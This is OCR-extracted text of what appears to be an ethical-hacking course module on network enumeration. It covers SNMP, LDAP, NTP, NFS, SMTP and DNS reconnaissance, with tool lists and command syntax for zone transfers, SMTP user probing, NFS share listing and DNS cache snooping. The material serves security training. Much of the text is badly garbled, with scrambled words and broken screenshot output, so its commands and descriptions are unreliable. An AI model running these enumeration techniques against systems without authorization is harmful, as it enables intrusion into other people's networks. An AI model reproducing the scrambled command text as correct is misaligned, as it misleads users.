IPaddressor range of IPaddresses
security threats.
of SNMP-

‘=

Snmpcheck
(snmp_enum
http://www.nothink.org
Source:
Snmpcheckis an open-source tool distributedunderthe GNUGeneralPublicLicense
(GPL).
Its goali s to automate the processof gathering
information
o n any devicewith
SNMPsupport(Windows, Unix-like,network appliances,
printers,etc.).Snmpcheck
allows ofSNMP
devices
and
user-friendly thein
places output
theenumeration
format.It couldbeusefulfor penetration
a human-readable
testingor systems
and
monitoring.
Attackersuse this tool to gather informationabout the target,suchas contact,
description,write access,devices,domain, hardware
andstorage information,
hostname,
Internet InformationServices (li) statistics,
IPforwarding,
listeningUDPports,location,
mountpoints, networkinterfaces, networkservices, routinginformation,software
components, uptime,TCPconnections,
system total memory, uptime,anduser accounts.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 4.8:of showing
Figure
us
Screenshot snmpcheck syteminformation
and
 SoftPerfect
NetworkScanner
Source:https://www.softperfect.com
SoftPerfect
can discover
shared
NetworkScanner ping computers,
any information
retrieve practically
scan ports,
aboutnetworkdevices via Windows
folders,and
Management
Instrumentation

filtering
(WMI),
SNMP,
anddisplay
Transfer
Protocol
options;
SSH,
and
Hypertext (HTTP),
files,andperformance
Italsoscansforremote services,registry,
andexportsNetScan
PowerShell
counters;offersflexible
resultsto a varietyof formatsranging
fromExtensible MarkupLanguage (XML)to JavaScript Object Notation(JSON).
SoftPerfect
Moreover, NetworkScannercan check
fora user-defined
portandreportif
one is
it
remote
IP range.It supports and
open. In addition,can resolvehostnames auto-detectthe localandexternal
shutdown andWake-on-LAN.
Attackersusesthistool to gather
informationabouta sharedfolderand
network
devices.

pen
Device

Send
Message
Gree Bach File
Deleterom

Figure420:
Screenshot
ofSoftPerfect
Network
Scanner

following
‘The are some additionalSNMPenumeration tools:
Monitor (https://www.solarwinds.com)
NetworkPerformance
(https://www.manageengine.com)
‘OpUtils
NetworkMonitor (htps://wwwpaessler.com)
PRTG
Toolset(https://www.solarwinds.com)
Engineer's

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

[NetBIOS
Enumeration

LDAPEnumeration

LDAP Enumeration

Aclenttarts LDAP
by
session to a decor system
connecting
agent
(5A] on TCPport 369and

LDAP Enumeration
Various protocols
enablecommunication andmanagedatatransferbetweennetworkresources.
All theseprotocolscarryvaluableinformation aboutnetworkresources alongwith the data,An
enumerates that informationbymanipulating
externaluser who successfully the protocolscan
breakinto the
Protocol(LOAP)networkandmaymisusethenetworkresources.TheLightweight
is one suchprotocol listings.
that accesses the directory
Directory
Access
Thissection focuseso n

ical andCountermensores
Mackin ©by E-Comel
Copyright
LDAPenumeration,the information
extractedvia LDAPenumeration,andLOAPenumeration
tools.
LDAPis a n Internetprotocol
for accessing distributeddirectoryservices. LDAPaccesses directory

toa other is
listings
withinActiveDirectory or from directoryservices. LDAP a hierarchical or logical
formof a directory, similar company’s organizational chart.Directory services mayprovide
any organizedset of records, often in a hierarchicaland logicalstructure, suchas a corporate

DNS lookups
emaildirectory.
and
the
fast of client
It uses
LDAPsessionbyconnecting
for quick
to a Directory System Agent
resolutionqueries.
(DSA), typically
A starts an
on TCPport389,and

an tothe Basic
sends operation
information Rules
request DSA.The
betweenthe clientandserver.
Encoding (BER) formatis usedto transmit

attacker can anonymously

‘An query the LDAPservice for sensitive informationsuch as
usernames,addresses,
departmental
details,
and server names, whichan attacker can use to
launch
attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 LDAP EnumerationTools

‘eis
etry Eporer(AD
Expr)

LDAPEnumerationTools
Thereare manyLDAPenumeration toolsthat accessthe directory
listings
withinActiveDirectory
or other directory
services. Byusingthesetools,
attackerscan enumerate informationsuchas
validusernames,addresses, detailsfromdifferent
anddepartmental LDAPservers,
=
SofterraLDAP
Administrator
Source:https://www.ldapadministrator.com
Softerra
LDAPAdministrator
is an LDAPadministration
toolthatworkswith LDAPservers
suchas ActiveDirectory,
NovellDirectory Services,
andNetscape/iPlanet. It browsesand
managesLDAPdirectories.As shown i n the screenshot, attackers use SofterraLDAP
Administratorto enumerate user detailssuchas first name, last name, emailaddress,
designation,officelocation,
andtelephone number.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 +

+
Jarat
are
LDAPAccountManager
tools:
Thefollowingsome additionalLDAPenumeration
=
LDAPAdminTool(hetps://www.ldapsoft.com)
(https://www.ldap-account-manager.org)
(https://securityxploded.com)
LDAPSearch

IXplorer
(http://www.jxplorer.org)
ActiveDirectory (AD
Explorer (https://docs.microsoft.com)
Explorer)

ical
Mackin
and ©by
CountermensoresCopyright
E-Comel
 ModuleFlow

[NetBIOS
Enumeration SMTP
and
DNS Enameration

LDAPEnumeration

NTPand NFSEnumeration
Administrators oftenoverlookthe NetworkTime Protocol(NTP) server when considering
security.However,if queried properly,
it can provide
valuablenetworkinformationto an
attacker.Therefore, to knowwhat information
it is necessary an attackercan obtain abouta
networkthrough NTPenumeration. TheNetworkFileSystem (NFS) is usedfor the management
of remote fileaccess.NFSenumeration helps to gather
attackers information suchas a listof
clientsconnectedto the NFSserver, along
with theirIPaddresses,
andexported directories.

Thissection describes
NTPenumeration commands,
tools.
the
NTPenumeration,informationextractedvia NTPenumeration, various
NTPenumeration tools,and NFSenumeration techniques and

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NTPEnumeration

Network
TimeProtocol
(NTP)is designed
tosynehronie
| AtackersquerytheNTP
server
to

Ieses UDP
por 12328s primarymeans of the em name,

(0/100second) to
NTPcan maintaintime within10miliseconds
over the publiInternet

unde
achieve
Incan accuracies of200 microseconds
or betes
Inocalarea networks ial condtions

NTP Enumeration
NTPis designed to synchronize
clocksof networkedcomputers. It uses UDPport 123 as its

primary
means ofcommunication.
Internet. Furthermore,
conditions.
NTPcan time
maintain
within
an msover
error of10 the public
it can achievean accuracyof 200 ps or better i n LANsunderideal

Thefollowing
are some piecesofinformation
an attacker
can obtainbyqueryingan NTPserver:
=
Listof hostsconnectedto the NTPserver
= i n the network,
ClientsIPaddresses their system
names,andOSs
‘+

Internal
IPs,server
demilitarized
(DMZ)
if the NTP is i n the zone

ical andCountermensores
Mackin ©by E-Comel
Copyright
 NTP EnumerationCommands

NTP EnumerationCommands
NTPenumeration commands suchasntpdate, ntptrace, ntpde,andntpq are usedto queryan
NTPserver for valuableinformation
=
ntpdate
Thiscommand collectsthe numberof time samples
fromseveraltime sources.Its syntax
is as follows:

ntpdate [-46bBdqsuv] [-a key] [-e authdelay] [-k keyfile] [-o

version] [-p samples][-t timeout] [ -U user_name]
server [...]
ForceDNSresolutionof givenhostnames to theIPv4namespace
ForceDNSresolutionof givenhostnames to theIPv6namespace

authentication
Forcethe time to
function/specify
Enabletheauthentication

beslewed
always
the key
to
identifier be usedfor

Forcethe time to bestepped

Enabledebugging
mode
authdelay
keyfile
y
|specify
processing
delay
Specify
for authentication
the
function
authentication
key
to perform

“keyfile";
the path the
an

fleasthestring thedefault
is /ete/ntp/keys
Version
NTP
Specify
the

| 1or2;the integer
version,
versionfor outgoing
defaultis 4
packets
as an whichcan be

Module
8 27
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 TP samples of 4
Specify
| Query
from
thenumber samples

1-8;
ranging
to beacquired
thedefaults
fromeachserver,withvalues

only;
not
Divertlogging
do settheclock
outputfromthestandardoutput(default syslog
to the system
facility
Specify
for
the maximum wait time a
Usean unprivileged
server
portfor outgoing
response;
1s
packets
thedefaults

Beverbose; logsntpdate’s
version identification
string,
Table
4.4;tpdateparametersan
thelr functions
respective

ntptrace
debugging
Figure4.2:Screenshotof the ntpdate
command,showing information
for a given

Thiscommanddetermineswherethe NTPserver obtainsthe time fromandfollowsthe

chain
ofNTPconnected
to
its
primary
syntaxuse
servers back
the list of NTPservers this time source. Attackers

isafollows:
s
to the network.Its
command to trace

ntptrace [-n] [-m maxhosts] [servername/1P_address]

7
Donot printhostnames andshowonly
IPaddresses;
maybeusefulif name server
isdown
=m maxhosts
| Setthe maximum
ofand
up
number levelsthe chainto befollowed

nptraceparameters ther respective

“Table
45: functions

Module
8 28
Page
and ©ical Mackin Countermensores
Copyright
by E-Comel
 Example:
# ntptrace
localhost: stratum 4, offset 0.0019529, synchdistance 0.143235
10.10.0.1: stratum 2, offset 0.01142
73, synchdistance 0.115554
10.10.1.1: stratum 1, offset 0.0017698, synchdistance 0.011193
ntpde
Thiscommand queriesthe ntpddaemonabout its current state andrequests in
that state, Attackersuse thiscommandto retrieve the state and statistics of eachNTP
server connected to the targetnetwork.Itssyntax
i s as follows:
changes
ntpde [-ilnps] [-c command][hostname/IP_address]
Following
-
argumentinterpreted
be given
as an multipleoptionsmay
interactiveformatcommand;

Forcentpdcto operatein theinteractivemode

(Obtain
alist
Output
toc
of peersknownto the server(s);
i n thedotted-quad
allhostaddresses
thisswitch
is equivalent listpeers|
numeric format,ratherthanhostnames

Printpeers
well
summary
of
their
alistof the as

their slightly
as a

Print alist of the peersas well asa summaryof

states;thisis equivalent
but in
states, a
tocpeers
differentformat,

-pable to-cthisis equivalent dmpeers,

thanthe switch;

46:parameters
and
their
respective mde functions

te obtainaddtionalNTPserver
Information

Figure4.13:
Screenshot
of the ntpde
command

8
Module 129
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
ntpq
Thiscommandmonitors the operationsof the NTPdaemonntpd and determines
performance.
Its syntaxis as follows:
ntpq [-inp] [-c command][host/IP_address]

Following command;
Debugging
mode
-c isan interactive format
argument multipleoptionsmaybegiven

Forcentpqto operatein the interactive mode

in thedotted-quad
Outputallhostaddresses numeric format,
ratherthanhostnames
Print lst ofthe peersas wellas
a of
their
summary states

Example:
ntpq> version
ntpq 4.2.8p1001.3728-0
ntpg> host,
current host is localhost

ntpgqueries
‘These can be
usedto obtainadditional
NTP
server
information

Figure424:Sereenshotof ntpacommand

Module
8 £20
Page tical andCountermensores
Making Copyright©
by Comet
 NTPEnumerationTools
{©PRTG
Network
Monitorincludes
SNTP
S ensor
monitor,a simplenetwork
te protcol(SNTP)
sew

NTP

Nmap
Enumeration
Tools
thtos//nmop
oa)

Wiresharkhtas//monwireshork
og

Uittps
ets
de protoscanner
prtealsco.o8)

(hep byefsioncom)

NTP EnumerationTools
NTPenumeration toolsare usedto monitor the working
of NTPandSNTPservers i n the network
andhelpi n the configuration
andverification of connectivity
fromthe time client to the NTP
servers.
=
PRTGNetworkMonitor
Source:https://www.paessler.com
monitors all systems,
PRTG andapplications
traffic,
devices, of IT infrastructure
byusing
technologies
various suchas SNMP,WMI,andSSH.
shownin the screenshot,
‘As attackersuse PRTGNetworkMonitor to retrieve SNTPserver
detailssuchas the responsetime fromthe server, active sensorswith the server, and
synchronization
time.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Response
Time Oterence

28msec

415:Screenshot
Figure ofPATENetwork
Monitor
Thefollowing
are some NTPenumeration tools:
+
(https://nmap.org)
Nmap
©
(https://www.wireshark.org)
Wireshark
=
(https://labs.portcullis.co.uk)
udp-proto-scanner
(http://www.bytefusion.com)
NTPServerScanner

Module
Page 8 22
tical
Making
and by CountermensoresCopyright©
Comet
 NFSEnumeration

TheNES on the
generalimplemented
s ystems
ie required
fr ctal
resources
theNFS hee
carver alongwith ‘and

NFSEnumeration
NFSis a typeof file system that enablesusers to access,view, store,and update files over a
remote server. These remote datacan beaccessed bythe clienti n thesame wayitis accessed
cn
thesystem.
or Depending
onprivileges
local
assigned
the
clients,
either
bothreadandwrite thedataonly the to theycan read

An NFSsystemis generally
implemented networkin whichthe centralization
on a computer of
data is required
for criticalresources. Theremote procedure
call (RPC)
is usedto route and

process
To
therequestbetween
accomplish
clientsandservers.
thetaskof sharing filesanddirectoriesover the network,the “exporting―
process
is used.However, the clientfirst attemptsto makethe file availablefor sharing byusingthe
“mounting―
process. The /etc/exports location on the NFSserver contains a listof clients
allowedto sharefileson the server. In this approach,to access the server, the onlycredential
used is the client's IP address.NFSversions before version 4 run on the same security
specification.
Enumerating NFSservices enablesattackers to identify
the exporteddirectories,listof clients
connectedto the NFSserver alongwith theirIP addresses,andthe shareddataassociated with
After gathering
the IP addresses. this information,the attackerscan spoof
their IP addresses to
gainfullaccessto the sharedfileson the server.

‘As
intan
he
shown

for an
attacker
open
NFS
portruns
the
(port
IP address following
NFS command
screenshot,
services
on 2049) andthe
xpeinfo
running it:
to scanthe target

zpeinfo ~p 10.10.10.16

8
Module 22
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
 vubuntu@ubuntu: ~

progran vers proto

100000 2 udp portmapper
100000
100000
190000
udp
udp
tep
portmapper
portmapper
portmapper
180808 tep portmapper
100000 tep or tnapper
100003
100003,
100003,
100803
100003,

100005
100005
nes
BEE
portanden
service rs
running
ont
100005,
180805
nountd
rountd
rountd
rountd
100021
100021 9
nlockngr
nlockngr
nlockrgr
nlockngr
nlockngr

shown thescreenshot,
‘As in
Screenshotof recinfo
Figure4.16;
an attackerruns the
command
open
displaying
following
NFSportand services

commandto view thelistof shared

filesanddirectories:
showmount -e
10.10.10.16

Export Ust for

Shared
folder
Figure427:
Further, attacker
an can
Seeenshot
use various
oftheshowmount
othercommands
3
command
displaying
shared
directory
andtoolsto gain access to the NFSserver
andupload
malicious
fileson theserver
tolaunch
furtherattacks.

8
Module 26
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
 NFSEnumerationTools CEH

NFSEnumerationTools
NFSenumeration toolsscan a networkwithina given range of IPaddresses
to
identify on
theNFSservicesrunning it. These
Usingportmap,alist of NFSshares,andalist of directoriesaccessible
or
toolsalsoassisti n obtaining
through
asingle
alist
IPaddress
of RPCservices
NFS; further,they
allowdownloading through
a file shared the NFSserver. Attackers usetoolssuch asRPCScan and

=
to
SuperEnum perform
RPCScan
NFSenumeration.

Source:https://aithub.com
RPCScan communicateswith RPC misconfigurations
services andchecks on NFSshares.

Asshownin the screenshot,

targetIP address runs
an attacker
foractive NFSservices:
Python3rpe-scan.py 10.10.10.19
the
followinga
--zpe
command
to enumerate

ical andCountermensores
Mackin ©by E-Comel
Copyright
 File Edit Vi search Terminal Help
@parrot
#python3rpc-scan.py 10.10.10.19 --rpc
rpc://10.10.10.19:111 Portmapper
for
npc services
lportmapper (100000)
lportmapper (100000)
10.10.10.19
udp
udp
1
ul

lportmapper
(100000) udp
lportmapper
tep
(100000)
lportmapper(100000) tep
in
1
1

(100000) tcp tcp

tep
m1
2049
2049
udp 2049
udp 2049

demon
demon
tep (100005)
(100005)
tcp
tep
2049
2049
2049

(100005)
demon
demon
demon
(100005)
(100005)
tep
udp
2049
2049
049
(100005) 2049
2049

lock
network
Inetwork
lock
mana
manager

lock
Inetwork manage:

Figure
418:
Screenshot
of
RPCScan
displaying
open
NFS
ports
and
serie

Module
Page
8 26
tical
Making
and CopyrightÂ
by
Comet
Countermensores
=
SuperEnum
Source:https://github.com
SuperEnum includesa scriptthat performsthe basicenumeration of any open port.As
shown an
attacker
uses
the script a
i n the screenshot,
text file name “Target.
‘enumeration.
txt― havinga target
./superenum andthenenters
IP addressor a list of IP addresses
for

~
#7superenum]
Running
script
[rar
cet.
txt] Filecontaining
targetIP address

4.19: runing
Figure
sri
Screenshotof SuperEnum

the scriptdisplays
After scanninga targetIP address, all the open ports,as showni n the
belowscreenshot. Port2049hasan NFSservice running,

Figure
4.20:
of displaying
port
Screenshot SuperEnum openNFS

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

[NetBIOS
Enumeration SMTP
and
DNS Enameration

LDAPEnumeration

SMTPand DNSEnumeration
This section describes enumeration techniquesto extract information relatedto network
resources. It also covers DNSenumeration techniques that yieldinformationabout the DNS
servers andnetworkinfrastructure ofthetargetorganization.
Thesection discussesbothSMTP
covering
SMTP process
andDNSenumerationtechniques,
alist
of
enumeratio
enumeration,the
validuserson an SMTPserver, SMTPenumeration tools,DNSzone transfer
of obtaining
DNS
andwalking,
cachesnooping, DNSzone

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SMTPEnumeration

SMTPEnumeration
Mail systemscommonly use SMTPwith POP3 andIMAP, whichenableusers to save messagesi n
the server mailboxanddownloadthemfromthe server whennecessary. SMTPuses mail
exchange (MX)servers to directmailvia DNS.It runs on TCPport25,2525,or $87,
the following
SMTPprovides threebuilt-incommands.
*
VRFY:Validatesusers
$ telnet 192.168.168.1 25
192,168,168.1
‘Trying
Connected to 192.168.168.1
Escapecharacter is '*]'
220 Wymaileerver ESMIP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleasedto meet you
VRFY Jonathan
250 Super-User <Jonathan@NYmailserver>
VREY smith
550 Smith... User unknown

ical andCountermensores
Mackin ©by E-Comel
Copyright
 $ telnet the
EXPN:Displaysactual
delivery
addresses
192.168.168.1 25 ofaliases
mailing
listsand

‘Trying
192.168.168.1.
Connected to 192.168.168.1
Escapecharacter is
'*

HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleased to meet you
EXPN Jonathan
280 Super-User <JonathantNYmailserver>
EXPN smith
550 Smith... User unknown

TO:
RCPT Definesthe recipients
$ telneti 192.168.168.1 25
of themessage

eying 192.168,168.1
Connected to 192.168.168.1
Escapecharacter is '*]'
220 Wymaileerver ESMIP Sendmail 8.9.3
HELO
501 HELO requires domain address
HELO x
250 NYmailserver Hello [10.0.0.86], pleasedto meet you
MAIL FROM:Jonathan
250 Jonathan... Sender ok
RCP? TO:Ryder
250 Ryder... Recipient ok
RCP?TO: Smith
550 smith... User unknown
SMTPservers respond differentlyto VRFY,
EXPN, andRCPT TOcommands forvalidandinvalid
users;therefore, valid users on the SMTPserver can be determined.Attackerscan directly

Administrators
a of
interact with SMTPvia theTelnetpromptandcollect list valid users on the SMTPserver.
and pen testers can perform SMTPenumeration usingcommand-lineutilities
suchas Telnetand netcat or byusing toolssuchas Metasploit,
Nmap,NetScanToolsPro,and
smtp-user-enum
a
to collect listofvalidusers,delivery
addresses,
message recipients,
etc.

8
Module £40
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
SMTP
Enumeration Tools CEH

SMTPEnumerationTools
SMTPenumeration tools are usedto perform username enumeration. Attackerscan use the
usernames obtainedfromthis enumeration to launchfurther attackson other systems
i n the
network.
=
NetScanTools
Pro
Source:https://www.netscantools.com
Pro'sSMTPEmailGeneratortool tests the processof sending
NetScanTools an email

and an
SMTP
messagethrough

extract
email
parameters,
server.
confirm/urgent
all the
flags.
can
header
Attackersuse NetScanTools
including
Profor SMTPenumeration
Attackers
alsorecordthe emailsessionin a logfile andthen view the communications between
NetScanToolsPro andthe SMP server i n the logfile.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 4.21;Sereenshoof NetSeanTaos
Figure Pro

smtp-user-enum,
Source:http://pentestmonkey.net
is a tool for enumerating
smtp-user-enum OS-level
user accountson Solarisvia theSMTP
service
and RCPT
passed
(sendmail).
TOcommands.
is performed
Enumeration byinspectingresponsesVRFY,
As showni n the screenshot, the to
EXPN,
smtp-user-enum needsto be
on to a list of users andat leasto ne targetrunningan SMTPservice. Thesyntax
for usingsmtp-user-enum is as follows:
smtp-user-enum.pl[options] (-u username|-U file-of-usernames) (~
t host|-T file-of-targets)
smtp-user-enum hasthe following options:

n:
-m
ofprocesses
(default:
Maximum number
-M mode:Specify
the SMTPcommandto use
5)
for username guessingfrom among

©
EXPN,
VRFY,
(default:
-wuser:
andRCPT
TO VRFY)
Checkif a user existson the remote system
f addr: Specify
the from emailaddressto use for "RCPTTO" guessing(default:
User@example.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
-D dom:Specify to the supplied
the domainto append user list to create email
none)
(default:
addresses
U
file:
-thost:
Select
thefile usernames
Specify
via
the
containing to check
the server hostrunningtheSMTPservice
SMTPservice

-Tile:
Select
-p port:
fileport
Specify
the

which
SMTP
theTCP
the
service
runs
(default:
on
running SMTP
hostnames
containing
the
service

25)
-d: Debugging output
stn:
-v:
Wait forreply
(default:
5)
for a maximum of n seconds the
Verbose
ch:Help
message

422;
Figure Screenshotof smtp-user-enum

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSEnumerationUsing
ZoneTransfer

DNSEnumerationUsing
ZoneTransfer
DNS
zone
transfer
to
server process
secondary
a of
transferring
is
copy
the
DNS
zone a of the file fromthe primaryONS
DNSserver. In most cases,the primaryDNSserver maintains a backup
or

secondary
holds
server for redundancy,
which
changes
all the informationstoredin the primaryserver.
The DNS server uses zone transferto distribute
secondary server(s).
An attackerperforms
made to the main server to the
DNSzone transferenumeration to locatethe ONS
server andaccess records
allowszone transfers,
hostnames,
of
of the targetorganization.
thenattackersc an perform
assigned
If the DNSserver the target
DNSzone transfer
machinenames, usernames, |P addresses, aliases,
organization
to obtainDNSserver names,
etc. within a target
domain.
In DNSenumeration usingzone transfer, an attackerattempts to retrieve a copyof the entire
zone file for a domainfromthe DNSserver. Attackers can perform DNSzone transferusingtools
suchas nslookup, digcommand, andDNSRecon. If the DNStransfersettingis enabledon the
targetname server, it will provide
the DNSinformation; else,
it will return an error stating
it has
failedor refused the zone transfer.
To perform a ONSzone transfer,the attackersendsa zone-transferrequestto the DNSserver

amountof DNS
pretendingto be a client;
the DNSserver thensendsa portionits databaseas a zone to the
attacker.Thiszone may
contain
a large of informationaboutthe zonenetwork.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 digCommand
‘Attackers
use the dig command o n Linux-basedsystems to querythe DNSname servers
andretrieveinformation aboutthe targethostaddresses, name servers, mailexchanges,
etc. Asshowni n the screenshot,attackersuse the followingcommandto perform DNS
zone
transfer:
dig ne <target domain>
Theabovecommandretrieves all the DNS name servers of the targetdomain.Next,
attackersuse one of the name servers fromthe output of the abovecommandto test
whetherthe targetDNSallowszone transfers.They use the followingcommandfor this
purpose:
dig @<domainof name server> <target domain> axfr

(fig.
ns
sno.
certi Fredhacker
>
co]

ns ww. certified

opcode:
SHEADER<c- QUERY,status: NOERROR
ra;
‘OPT
ar rd 1, AN
QUERY:
PSEUDOSECTION:
ENS: versi
SECTION
‘QUESTION

TRSWER SECTTON

Forti 21599
i. certifiedhacker.com. 14399 certifiedha
fiedhacker si. blueh«
Fertifiedhacker 21599

Querytine: 325
nsec
SERVER: 6.8.8.6053(8.8.8.6)
WHEN:Tue Nov 05 00:51:35 est 2

MSGSIZE. revd:1 11

‘Pig.
Gnsi.
bluehost
fiedhacker
com

Dig 9,11,5-P4-3-Debian
war corti

<o>
@rsl,blue

+
(1 server found)
global options: snd
Transfer failed

423; Screenshotof LinuxONSzone transfer

Figure
using
dig command

Modul
8 445
Page tical andCountermensores
Making Copyright©
by Comet
nslookupCommand
Source:https://docs.
microsoft.com
‘Attackers
servers
use the nslookup

exchanges,
command
and retrieve information
on Windows-based
aboutthe targethostaddresses,
etc. Asshowni n the screenshot,
systems
toquery
the
DNS
name
name servers, mail
attackersuse the following
commandto
perform
DNSzone transfer:
nslookup
set querytype=soa
<target domain>
Theabovecommand setsthe query typeto theStartof Authority
(SOA)
recordto retrieve
administrativeinformationabout the ONS zone of the target domain
certifiedhacker.com, Thefollowing commandis usedto attemptto transferthe
zone ofthespecified
name server:
(1s ~4 <domain of name server>

Figure
424; ONS
zone
using
the
Screenshotof Windows transfer nslookup command

ical andCountermensores
Mackin ©by E-Comel
Copyright
=
DNSRecon
Source:https://github.com
Attackersuse DNSRecon
to checkall NSrecordsof the targetdomainfor zone transfers.
‘As attackersuse thefollowing
shownin the screenshot, command forDNSzone transfer:
dnsrecon -t axfr -d <target domain>
In the above
command,
the -doptionspecifies
-t
the optionspecifies
thetargetdomain,
the
type
are ato
ofenumerationbe performed,
axfr is thetypeof enumerationi n whichall NSservers testedfor zonetransfer,
and

erver 162.159.25.175

80 Ha:
r Fai

Sereenshotof ONSzone transfer

Figure4.25: usingONSReco

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSCacheSnooping CEH

DNSCacheSnooping
DNScachesnooping is a typeof DNSenumeration technique i n whichan attackerqueries the
DNSserver for a specific
cached DNSrecord.Byusingthiscached record,the attackercan
determinethe sites recently
visitedbythe user. Thisinformationcan furtherrevealimportant
informationsuchas thename of theowner
ofthe
DNSserver, its service provider,
its vendor,and bankdetails. Byusingthis information,
user. Attackersperform
engineeringattackon the target
the name of
the attackercan perform a social
DNScachesnoopingusingvarious tools
suchas the digcommand, DNSSnoop Dogg,andDNSRecon.
Attackersuse the following
two DNScachesnooping methodsto snoop on a targetdomain,
Non-recursive Method
In thismethod,
the Recursion
fora specific bitA, zero.
DNSrecordsuchasCNAME,
query
to snoopon a DNSserver, attackers

Attackers
Desired(RD) i n the queryheader
PTR,
senda non-recursive
to
CERT, SRV,
bysetting
querythe DNS
andMX. Ifthe queried
cache
record
is presentin the DNS
some user on the system
responds
cache,
DNS
the serverresponds
hasvisited a specific
with the information
withthe informationindicating
domain.Otherwise,
that
the DNS server
aboutanotherDNSserver that can return an answer to
the query, or it replies
with the root .hints file containinginformationaboutall root
DNSservers.
Attackersuse the dig commandfollowedbythe name/lP addressof the ONSserver,
domainname, andtypeof DNSrecord file,The+norecurse optionis usedto set the
query to non-recursive

dig @<IPof DNS server> <Target domain> A tnorecurse

ical andCountermensores
Mackin ©by E-Comel
Copyright
 shownin the screenshot,
‘As the status NOERRORimplies that the querywas accepted
but n o answer was returned,
thereby indicating
that no user fromthe system hadvisited
the
queried
site.

Indicates
thatthequery is
accepted,
butthe
cachedsite
is not

Figure426:
Screenshot
ofa digqueryfora ste thatisnot caches
Recursive
Method
In this method,
to snoop on the DNSserver, attackerssenda recursive query bysetting
the +recurse optioninsteadofthe norecurse
method,
PTR, CERT, SRV, andMX.
to
option.Similar the non-recursive
the attackersquery the DNScachefor a specific DNSrecordsuchas A,CNAME,

In this method,the time-to-live(TTL)fieldis examinedto determinethe durationfor

iscompared
is TTLinthe
whichthe DNSrecordremains
was
initially
TTL
withthe that
TTL result
field.
lessthan the initial TTLvalue,
cache.Here,the TTLvalueobtainedfromthe
set in the
the recordis cached,
Ifthe valuei n theresult
indicating
that someone on the
hasthat
site.
system visited However,ifthequeried recordwere not present
it will beaddedto thecacheafterthefirst query Is sent.
in the cache,

Attackersuse the same dig commandas i n the non-recursive methodbut with the
trecurse optioninsteadof thetnorecurse option:
dig @<IP of DNS server> <Target domain> A trecurse

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘As the TTLvaluefor the domaincertifiedhacker.
shownin the screenshot, com is
considerably
thequerywas
low,whichstrongly
issued,
thatthedomain
suggests
was
already
i n thecachewhen

Alow TTLvalue
indicates
cachedqueried
site

Figure
427:Screenshot
ofa digquery
fora
cached
ste

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSSECZoneWalking

DNSSECZoneWalking
DomainNameSystem
SecurityExtensions (DNSSEC) zone walking is a typeof DNSenumeration
technique
configured.
map.
attacker
i n which
attempts
an

assist @
to obtaininternal
Theenumeratedzone informationcan
recordsif theDNSzone is not properly
the attackeri n buildinghost network

Organizations use DNSSEC to add security featuresto the DNSdata andprovide protection
against
keycryptography uses
digital
knownthreatsto the DNS.Thissecurity
to strengthen
DNSname servers along
feature
authenticationi n DNS.These
with common recordssuchas MX,A,AAAA,
signatures
digital
signatures
andCNAME.
basedon public-
are storedin the

While DNSSECprovides it is also susceptible

Internet security, to a vulnerabilitycalledzone
enumeration or zone walking. Byexploiting this vulnerability,attackerscan obtain network
a
informationof target domain, basedon whichtheymay launchInternet-based attacks.
To overcome the zone enumeration vulnerability,
version 3 (NSEC3) is used.TheNSEC3
exceptthat it provides
cryptographically
a new
recordprovides versionof DNSSEC that uses NextSecure
the same functionality
hashedrecordnames that are designed
as NSEC
to prevent
records,
the
enumeration of recordnamespresent in the zone,
To perform zone enumeration, attackerscan use various DNSSEC zone enumerators suchas
LONS,DNSRecon, nsec3map,nsec3walker, andDNSwalk.
DNSSEC ZoneWalking Tools
DNSSEC zone walkingtoolsare usedto enumerate the targetdomain’sDNSrecordfiles.These
tools can alsoperformzone enumeration on NSECand NSEC3recordfilesandfurther use the
gathered information (DoS)
to launchattackssuchas denial-of-service attacksand phishing

ical andCountermensores
Mackin ©by E-Comel
Copyright
 LDNS,
Source:https://www.ninetlabs.n!
LONS-walk
enumerates the DNSSEC
zone andobtainsresults
on the DNSrecordfiles

‘As attackersuse the following

shownin the screenshot, query to enumerate a target
domainiana.oxg usingthe DNSserver 8.8.8.8 to obtainDNSrecordfiles:
ldns-walk @<IPof DNS Server> <Target domain>

ubuntu@ubuntu:

ana.org
Japt.tana.org. CNAMERRSIGNSEC
lapp.tana.org. CNAME
RRSIG NSEC
jautodiscover.tana.org.
CNAMERRSIG NSEC
lbtackhote-1.iana.org A RRSIG NSEC

lbtackhote
btackhote
+

ARAARRSIGNSEC
A AAA RRSIG NSEC

Ibtackhote
;

AAAA RRSIGNSt
Jdata.tana.org. CNAMERRSIGNSEC
ldatatracker.tana.org iE RRSIG NSEC
idev.ana.org. CNAMERRSIG NSEC
feedback. tana.org. CNAME
RRSIG NW Enumerated
pata thea
ttar.tana.org.
on

Jnaintenance.tana.org.
A
AAAA

CNAMERRSIG NSEC
Intta-portal.tana.org.
CNAMERRSIG W:
RRSIGNSEC
DNSrecordfile

Intta-ut.tana.org. CNAMERRSIG NSEC

lnunber-6.tana.org.AAAARRSIGNSEC
lpen.tana.org.CNAMERRSIGNSEC
lppa-request.tana-org.MX RRSIGNSEC
lprisoner.tana.org. A AAAA RRSIG NSEC
Irdap.tana.org.CNAMERRSIGNSEC
recursive. 1ana.org. A AMAA RRSIGNSEC

Figure428; of LONS
Screenshot
displaying
results.o nthe targetd omain

8
Module 452
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
DNSRecon
Source:https://www.github.com
DNSRecon
tool
that
assists DNS
is a zone enumeration
